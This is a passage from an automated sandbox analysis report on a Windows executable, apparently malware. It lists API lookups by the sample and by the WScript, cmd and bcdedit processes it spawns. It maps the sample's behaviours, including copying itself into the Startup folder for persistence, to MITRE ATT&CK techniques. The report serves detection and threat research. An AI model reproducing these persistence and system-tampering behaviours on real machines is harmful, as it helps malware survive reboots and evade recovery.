\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterClass (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateWindowEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetWindowLong (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetWindowLong (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CallWindowProc (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleDC (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeA (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005752)\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005752)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WintrustCertificateTrust (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubAuthenticode (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubInitialize (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadMessage (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadSignature (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCheckCert (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCleanup (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter MsiSIPIsMyTypeOfFile (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter StgOpenStorage (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter IsFileSupportedName (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter PutSignedDataMsg (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetSignedDataMsg (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32RedirectTypeLibrary (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00001988)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00001988)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005672)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005672)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005764)\n \"bcdedit.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005764)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005948)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" called \"CopyFileW\" to copy C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe to new location %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (UID: 00000000-00005752)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63590000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844bd568@IPHLPAPI.DLL\"\n \"0f001000dc4bd568@IPHLPAPI.DLL\"\n \"0c000d00244cd568@IPHLPAPI.DLL\"\n \"140015006c4cd568@IPHLPAPI.DLL\"\n \"0c000d00e04cd568@IPHLPAPI.DLL\"\n \"15001600c03ed568@ADVAPI32.dll\"\n \"0e000f00703fd568@ADVAPI32.dll\"\n \"0e000f00cc3fd568@ADVAPI32.dll\"\n \"11001200b447d568@ADVAPI32.dll\"\n \"110012004848d568@ADVAPI32.dll\"\n \"120013008c48d568@ADVAPI32.dll\"\n \"12001300e448d568@ADVAPI32.dll\"\n \"14001500386ed568@ADVAPI32.dll\"\n \"14001500506ed568@ADVAPI32.dll\"\n \"14001500686ed568@ADVAPI32.dll\"\n \"17001800806ed568@ADVAPI32.dll\"\n \"0d000e00986ed568@ADVAPI32.dll\"\n \"11001200a86ed568@ADVAPI32.dll\"\n \"11001200bc6ed568@ADVAPI32.dll\"\n \"0d000e003449d568@shell32.dll\"\n \"0d000e00b049d568@shell32.dll\"\n \"10001100c46fd568@CRYPT32.dll\"\n \"12001300e86fd568@CRYPT32.dll\"\n \"0f001000fc6fd568@ADVAPI32.dll\"\n \"140015000c70d568@CRYPT32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74D10000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 748D0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"RasPbFile\"\n \"Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" touched \"CLSID_SearchFolder\" (Path: 